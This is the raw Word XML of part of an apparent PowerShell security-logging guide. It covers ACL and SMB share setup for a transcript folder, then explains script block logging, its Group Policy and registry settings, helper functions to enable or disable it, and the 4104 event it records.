          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Allow"</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$accessRule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New-Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System.Security.AccessControl.FileSystemAccessRule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$permission</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color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AddAccessRule(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$accessRule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</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Deny "Creator Owner" everything. This prevents users from</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viewing the content of previously written files.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$creatorOwner</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8080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System.Security.Principal.NTAccount</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"Creator Owner"</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$permission</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FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$creatorOwner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"FullControl"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ObjectInherit,ContainerInherit"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"InheritOnly"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Deny"</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$accessRule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New-Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System.Security.AccessControl.FileSystemAccessRule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$permission</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color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AddAccessRule(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$accessRule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</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the ACL</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$acl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Set-Acl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c:\Transcripts\</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the SMB Share, granting Everyone the right to read and write files. Specific</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actions will actually be enforced by the ACL on the file folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57879" w:rsidRDefault="00C57879" w:rsidP="00C5787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New-SmbShare</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Transcripts</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8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c:\Transcripts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-ChangeAccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Everyone</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57879" w:rsidRDefault="00C57879" w:rsidP="005C5B69"/>
    <w:p w:rsidR="005D400F" w:rsidRDefault="006174D0" w:rsidP="006174D0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="005D400F">
        <w:t xml:space="preserve">eep </w:t>
      </w:r>
      <w:r w:rsidR="00C21F80">
        <w:t xml:space="preserve">script block </w:t>
      </w:r>
      <w:r w:rsidR="005D400F">
        <w:t>logging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E1D93" w:rsidRDefault="004E1D93" w:rsidP="004E4FB1">
      <w:r>
        <w:t xml:space="preserve">A PowerShell “script block” is the base level of executable code in PowerShell. It might represent a command typed interactively in the PowerShell console, </w:t>
      </w:r>
      <w:r w:rsidR="008724F6">
        <w:t xml:space="preserve">supplied </w:t>
      </w:r>
      <w:r w:rsidR="005F3319">
        <w:t>through the command line</w:t>
      </w:r>
      <w:r w:rsidR="008C527E">
        <w:t xml:space="preserve"> (“</w:t>
      </w:r>
      <w:r w:rsidR="008C527E" w:rsidRPr="00440FB0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PowerShell –Command &lt;…&gt;</w:t>
      </w:r>
      <w:r w:rsidR="008C527E">
        <w:t>”)</w:t>
      </w:r>
      <w:r w:rsidR="005F3319">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00344BE8">
        <w:t>or wrapped in a function, script, workflow, or the like.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E33384" w:rsidRDefault="004E4FB1" w:rsidP="00E33384">
      <w:r>
        <w:t xml:space="preserve">In addition to over-the-shoulder style transcription, PowerShell v5 </w:t>
      </w:r>
      <w:r w:rsidR="00653BA7">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00653BA7" w:rsidRPr="00A339D2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>KB 3000850</w:t>
      </w:r>
      <w:r w:rsidR="00653BA7">
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidR="00BD0CA1">
        <w:t xml:space="preserve">ntroduces </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">deep </w:t>
      </w:r>
      <w:r w:rsidR="00C21F80">
        <w:t xml:space="preserve">script block </w:t>
      </w:r>
      <w:r>
        <w:t>logging.</w:t>
      </w:r>
      <w:r w:rsidR="00C21F80">
        <w:t xml:space="preserve"> When you enable script block logging, </w:t>
      </w:r>
      <w:r w:rsidR="001F4A5C">
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:r w:rsidR="00027574">
        <w:t xml:space="preserve">records </w:t>
      </w:r>
      <w:r w:rsidR="00440FB0">
        <w:t>the content of all script blocks that it processes.</w:t>
      </w:r>
      <w:r w:rsidR="000E322B">
        <w:t xml:space="preserve"> If a script block uses dynamic code generation (i.e.: </w:t>
      </w:r>
      <w:r w:rsidR="000E322B">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$command</w:t>
      </w:r>
      <w:r w:rsidR="000E322B">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E322B">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="000E322B">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E322B">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"'Hello World'"</w:t>
      </w:r>
      <w:r w:rsidR="000E322B">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidR="000E322B">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Invoke-Expression</w:t>
      </w:r>
      <w:r w:rsidR="000E322B">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E322B">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$command</w:t>
      </w:r>
      <w:r w:rsidR="000E322B">
        <w:t>), PowerShell will log the invocation of this generated script</w:t>
      </w:r>
      <w:r w:rsidR="00DA5001">
        <w:t xml:space="preserve"> block</w:t>
      </w:r>
      <w:r w:rsidR="000E322B">
        <w:t xml:space="preserve"> as well.</w:t>
      </w:r>
      <w:r w:rsidR="000A6E71">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="005E74AC">
        <w:t>provides complete insight into the script-based activity on a system – including scripts or applications that leverage dynamic code generation in an attempt to evade detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0028039C" w:rsidRDefault="0028039C" w:rsidP="00E33384">
      <w:r>
        <w:t xml:space="preserve">As with </w:t>
      </w:r>
      <w:r w:rsidR="00E82FD4">
        <w:t xml:space="preserve">transcription </w:t>
      </w:r>
      <w:r>
        <w:t>support</w:t>
      </w:r>
      <w:r w:rsidR="00E82FD4">
        <w:t xml:space="preserve">, this deep script block logging applies to </w:t>
      </w:r>
      <w:r w:rsidR="002F055F">
        <w:t>any application that hosts the PowerShell engine – the command line shell, ISE, or custom host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921802" w:rsidRDefault="003B7F2B" w:rsidP="00A2707B">
      <w:r>
        <w:t xml:space="preserve">To enable automatic transcription, enable the ‘Turn on PowerShell Script Block Logging’ feature in Group Policy through </w:t>
      </w:r>
      <w:r w:rsidRPr="001E53DF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Windows Components -&gt; Administrative Templates -&gt; Windows PowerShell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. For automation, the configuration settings are stored under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HKLM:\Software\Policies\Microsoft\Windows\PowerShell\</w:t>
      </w:r>
      <w:r w:rsidR="00141BED">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ScriptBlockLogging</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00921802">
        <w:t>By default, PowerShell only logs scripts blocks the first time they are used. If you select ‘</w:t>
      </w:r>
      <w:r w:rsidR="00921802" w:rsidRPr="00921802">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Log script block invocation start / stop events</w:t>
      </w:r>
      <w:r w:rsidR="00921802">
        <w:t>’, PowerShell also logs start and stop events for every time a script block is invoked.</w:t>
      </w:r>
      <w:r w:rsidR="00FE284D">
        <w:t xml:space="preserve"> This latter setting can generate an extremely high volume of events, so should be enabled with caution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B7F2B" w:rsidRDefault="003B7F2B" w:rsidP="00A2707B">
      <w:r>
        <w:t xml:space="preserve">The following PowerShell functions let you enable and disable the system-wide </w:t>
      </w:r>
      <w:r w:rsidR="00141BED">
        <w:t xml:space="preserve">script block logging </w:t>
      </w:r>
      <w:r>
        <w:t>policies.</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lastRenderedPageBreak/>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enable-PSScriptBlockLogging</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"HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"</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A9A9A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$null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EnableScriptBlockLogging</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"1"</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Disable-PSScriptBlockLogging</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Remove-Item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging</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000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-Recurse</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Enable-PSScriptBlockInvocationLogging</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"HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"</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A9A9A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$null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EnableScriptBlockInvocationLogging</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"1"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E96B1E" w:rsidRDefault="00E96B1E" w:rsidP="00E96B1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801261" w:rsidRDefault="00801261" w:rsidP="00A2707B"/>
    <w:p w:rsidR="00801261" w:rsidRDefault="00A811C1" w:rsidP="00A2707B">
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="0021393E">
        <w:t xml:space="preserve">ost companies only realize the need to enable </w:t>
      </w:r>
      <w:r w:rsidR="008832D2">
        <w:t xml:space="preserve">script block logging </w:t>
      </w:r>
      <w:r w:rsidR="0021393E">
        <w:t>after it is too late</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001064CC">
        <w:t xml:space="preserve">To provide some </w:t>
      </w:r>
      <w:r w:rsidR="00820371">
        <w:t>recourse</w:t>
      </w:r>
      <w:r w:rsidR="001064CC">
        <w:t xml:space="preserve"> in this </w:t>
      </w:r>
      <w:r w:rsidR="00820371">
        <w:t>situation</w:t>
      </w:r>
      <w:r w:rsidR="001064CC">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="0021393E">
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:r w:rsidR="00D579E2">
        <w:t xml:space="preserve">automatically logs script blocks </w:t>
      </w:r>
      <w:r w:rsidR="005068D5">
        <w:t xml:space="preserve">when they </w:t>
      </w:r>
      <w:r w:rsidR="004F5823">
        <w:t xml:space="preserve">have content often used by malicious scripts. </w:t>
      </w:r>
      <w:r w:rsidR="00CE0ABC">
        <w:t xml:space="preserve">This automatic script block logging is not intended to replace antivirus or </w:t>
      </w:r>
      <w:r w:rsidR="001A4EEB">
        <w:t xml:space="preserve">full </w:t>
      </w:r>
      <w:r w:rsidR="00CE0ABC">
        <w:t>script block logging</w:t>
      </w:r>
      <w:r w:rsidR="00461750">
        <w:t xml:space="preserve"> – it only serves as a </w:t>
      </w:r>
      <w:r w:rsidR="00E56927">
        <w:t xml:space="preserve">record </w:t>
      </w:r>
      <w:r w:rsidR="00845E66">
        <w:t>of last resort.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B22252" w:rsidRDefault="00B22252" w:rsidP="00A2707B">
      <w:r>
        <w:t>To disable automatic script block logging, set the “</w:t>
      </w:r>
      <w:r w:rsidRPr="008233E3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Turn on Script Block Logging</w:t>
      </w:r>
      <w:r>
        <w:t>” feature to “</w:t>
      </w:r>
      <w:r w:rsidRPr="008233E3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Disabled</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="008233E3">
        <w:t>. Alternatively, specify “</w:t>
      </w:r>
      <w:r w:rsidR="008233E3" w:rsidRPr="008233E3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="008233E3">
        <w:t xml:space="preserve">” for the </w:t>
      </w:r>
      <w:r w:rsidR="008233E3" w:rsidRPr="008233E3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>EnableScriptBlockLogging</w:t>
      </w:r>
      <w:r w:rsidR="008233E3">
        <w:t xml:space="preserve"> registry key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F74E8" w:rsidRDefault="006F74E8" w:rsidP="006F74E8">
      <w:r>
        <w:t xml:space="preserve">When </w:t>
      </w:r>
      <w:r w:rsidR="006C7B73">
        <w:t xml:space="preserve">script block logging is </w:t>
      </w:r>
      <w:r>
        <w:t>enabled</w:t>
      </w:r>
      <w:r w:rsidR="006C7B73">
        <w:t xml:space="preserve">, PowerShell will log </w:t>
      </w:r>
      <w:r w:rsidR="00373859">
        <w:t xml:space="preserve">the following </w:t>
      </w:r>
      <w:r w:rsidR="006C7B73">
        <w:t xml:space="preserve">events </w:t>
      </w:r>
      <w:r w:rsidR="00FC50CB">
        <w:t xml:space="preserve">to the </w:t>
      </w:r>
      <w:r w:rsidR="00FC50CB" w:rsidRPr="00FC50CB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Microsoft-Windows-PowerShell/Operational</w:t>
      </w:r>
      <w:r w:rsidR="00FC50CB">
        <w:t xml:space="preserve"> log</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="6585" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1463"/>
        <w:gridCol w:w="5122"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C25212" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:trPr>
          <w:trHeight w:val="257"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00C25212" w:rsidRPr="00866A12" w:rsidRDefault="00C25212" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>EventId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00C25212" w:rsidRPr="00866A12" w:rsidRDefault="0052288E" w:rsidP="00184D5C">
            <w:r>
              <w:t xml:space="preserve">4104 / </w:t>
            </w:r>
            <w:r w:rsidR="00C25212" w:rsidRPr="00592EC6">
              <w:t>0x1008</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:trPr>
          <w:trHeight w:val="257"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Operational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:trPr>
          <w:trHeight w:val="272"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidRDefault="006F74E8" w:rsidP="00BA72F1">
            <w:r w:rsidRPr="00866A12">
              <w:t xml:space="preserve"> Verbose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006F74E8" w:rsidRPr="00866A12" w:rsidTr="00BA72F1">
        <w:trPr>
          <w:trHeight w:val="257"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
